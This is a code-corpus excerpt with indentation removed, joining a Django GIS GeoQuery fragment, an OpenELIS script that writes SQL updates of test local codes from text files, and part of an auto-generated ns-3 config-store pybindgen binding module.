# The following attributes are customized for the GeoQuerySet.
# The GeoWhereNode and SpatialBackend classes contain backend-specific
# routines and functions.
self.custom_select = {}
self.transformed_srid = None
self.extra_select_fields = {}
def clone(self, *args, **kwargs):
obj = super(GeoQuery, self).clone(*args, **kwargs)
# Customized selection dictionary and transformed srid flag have
# to also be added to obj.
obj.custom_select = self.custom_select.copy()
obj.transformed_srid = self.transformed_srid
obj.extra_select_fields = self.extra_select_fields.copy()
return obj
def convert_values(self, value, field, connection):
"""
Using the same routines that Oracle does we can convert our
extra selection objects into Geometry and Distance objects.
TODO: Make converted objects 'lazy' for less overhead.
"""
if connection.ops.oracle:
# Running through Oracle's first.
value = super(GeoQuery, self).convert_values(value, field or GeomField(), connection)
if value is None:
# Output from spatial function is NULL (e.g., called
# function on a geometry field with NULL value).
pass
elif isinstance(field, DistanceField):
# Using the field's distance attribute, can instantiate
# `Distance` with the right context.
value = Distance(**{field.distance_att: value})
elif isinstance(field, AreaField):
value = Area(**{field.area_att: value})
elif isinstance(field, (GeomField, GeometryField)) and value:
value = Geometry(value)
elif field is not None:
return super(GeoQuery, self).convert_values(value, field, connection)
return value
def get_aggregation(self, using, force_subq=False):
# Remove any aggregates marked for reduction from the subquery
# and move them to the outer AggregateQuery.
connection = connections[using]
for alias, aggregate in self.aggregate_select.items():
if isinstance(aggregate, gis_aggregates.GeoAggregate):
if not getattr(aggregate, 'is_extent', False) or connection.ops.oracle:
self.extra_select_fields[alias] = GeomField()
return super(GeoQuery, self).get_aggregation(using, force_subq)
def resolve_aggregate(self, value, aggregate, connection):
"""
Overridden from GeoQuery's normalize to handle the conversion of
GeoAggregate objects.
"""
if isinstance(aggregate, self.aggregates_module.GeoAggregate):
if aggregate.is_extent:
if aggregate.is_extent == '3D':
return connection.ops.convert_extent3d(value)
else:
return connection.ops.convert_extent(value)
else:
return connection.ops.convert_geom(value, aggregate.source)
else:
return super(GeoQuery, self).resolve_aggregate(value, aggregate, connection)
# Private API utilities, subject to change.
def _geo_field(self, field_name=None):
"""
Returns the first Geometry field encountered; or specified via the
`field_name` keyword. The `field_name` may be a string specifying
the geometry field on this GeoQuery's model, or a lookup string
to a geometry field via a ForeignKey relation.
"""
if field_name is None:
# Incrementing until the first geographic field is found.
for fld in self.model._meta.fields:
if isinstance(fld, GeometryField):
return fld
return False
else:
# Otherwise, check by the given field name -- which may be
# a lookup to a _related_ geographic field.
return GeoWhereNode._check_geo_field(self.model._meta, field_name)
|
kalwar/openelisglobal-core | refs/heads/develop | liquibase/OE4.2/testCatalogHT_LNSP/scripts/createLocalCode.py | 25 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def trim( name, length):
if len( name ) <= length:
return name
else:
last_space = name.find(" ")
if last_space == -1:
return name[:35]
else:
return trim( name[:last_space], length)
def translate( name ):
if name == 'Sang total':
return 'Blood'
else:
return name
english_test_names = []
french_test_names = []
sample_types = []
name_results = []
guids = []
english_name_file = open('englishTestName.txt','r')
french_name_file = open('testName.txt', 'r')
sample_type_file = open("sampleType.txt", 'r')
result_file = open("../localCode.sql", "w")
guid_file = open("guid.txt", "r")
for line in english_name_file:
english_test_names.append(line.strip())
english_name_file.close()
for line in french_name_file:
french_test_names.append(line.strip())
french_name_file.close()
for line in sample_type_file:
sample_types.append(line.strip())
sample_type_file.close()
for line in guid_file:
guids.append(line.strip())
guid_file.close()
updateString = "update clinlims.test set local_code='"
for row in range(0, len(guids)):
if guids[row]:
test_name = english_test_names[row] if english_test_names[row] else french_test_names[row]
sample_type = sample_types[row] if sample_types[row] else "variable"
name_results.append(updateString)
name_results.append(trim(test_name, 35) + "-" + translate(sample_type) + "' where guid = '" + guids[row] + "';\n")
for line in name_results:
result_file.write(line)
print "Done look for results in localCode.sql"
|
std05048/Thesis | refs/heads/master | src/config-store/bindings/modulegen__gcc_LP64.py | 42 | from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.config_store', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## file-config.h (module 'config-store'): ns3::FileConfig [class]
module.add_class('FileConfig', allow_subclassing=True)
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore [class]
module.add_class('GtkConfigStore')
## hash.h (module 'core'): ns3::Hasher [class]
module.add_class('Hasher', import_from_module='ns.core')
## file-config.h (module 'config-store'): ns3::NoneFileConfig [class]
module.add_class('NoneFileConfig', parent=root_module['ns3::FileConfig'])
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## config-store.h (module 'config-store'): ns3::ConfigStore [class]
module.add_class('ConfigStore', parent=root_module['ns3::ObjectBase'])
## config-store.h (module 'config-store'): ns3::ConfigStore::Mode [enumeration]
module.add_enum('Mode', ['LOAD', 'SAVE', 'NONE'], outer_class=root_module['ns3::ConfigStore'])
## config-store.h (module 'config-store'): ns3::ConfigStore::FileFormat [enumeration]
module.add_enum('FileFormat', ['XML', 'RAW_TEXT'], outer_class=root_module['ns3::ConfigStore'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
## Register a nested module for the namespace Hash
nested_module = module.add_cpp_namespace('Hash')
register_types_ns3_Hash(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_types_ns3_Hash(module):
root_module = module.get_root()
## hash-function.h (module 'core'): ns3::Hash::Implementation [class]
module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash32Function_ptr')
typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash32Function_ptr*')
typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash32Function_ptr&')
typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash64Function_ptr')
typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash64Function_ptr*')
typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash64Function_ptr&')
## Register a nested module for the namespace Function
nested_module = module.add_cpp_namespace('Function')
register_types_ns3_Hash_Function(nested_module)
def register_types_ns3_Hash_Function(module):
root_module = module.get_root()
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class]
module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class]
module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class]
module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class]
module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
def register_methods(root_module):
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3FileConfig_methods(root_module, root_module['ns3::FileConfig'])
register_Ns3GtkConfigStore_methods(root_module, root_module['ns3::GtkConfigStore'])
register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher'])
register_Ns3NoneFileConfig_methods(root_module, root_module['ns3::NoneFileConfig'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3ConfigStore_methods(root_module, root_module['ns3::ConfigStore'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation'])
register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a'])
register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32'])
register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64'])
register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3'])
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3FileConfig_methods(root_module, cls):
## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig(ns3::FileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::FileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): void ns3::FileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3GtkConfigStore_methods(root_module, cls):
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore(ns3::GtkConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::GtkConfigStore const &', 'arg0')])
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore() [constructor]
cls.add_constructor([])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
return
def register_Ns3Hasher_methods(root_module, cls):
## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Hasher const &', 'arg0')])
## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor]
cls.add_constructor([])
## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')])
## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('char const *', 'buffer'), param('size_t const', 'size')])
## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function]
cls.add_method('GetHash32',
'uint32_t',
[param('std::string const', 's')])
## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('char const *', 'buffer'), param('size_t const', 'size')])
## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function]
cls.add_method('GetHash64',
'uint64_t',
[param('std::string const', 's')])
## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function]
cls.add_method('clear',
'ns3::Hasher &',
[])
return
def register_Ns3NoneFileConfig_methods(root_module, cls):
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig(ns3::NoneFileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NoneFileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_virtual=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetHash() const [member function]
cls.add_method('GetHash',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
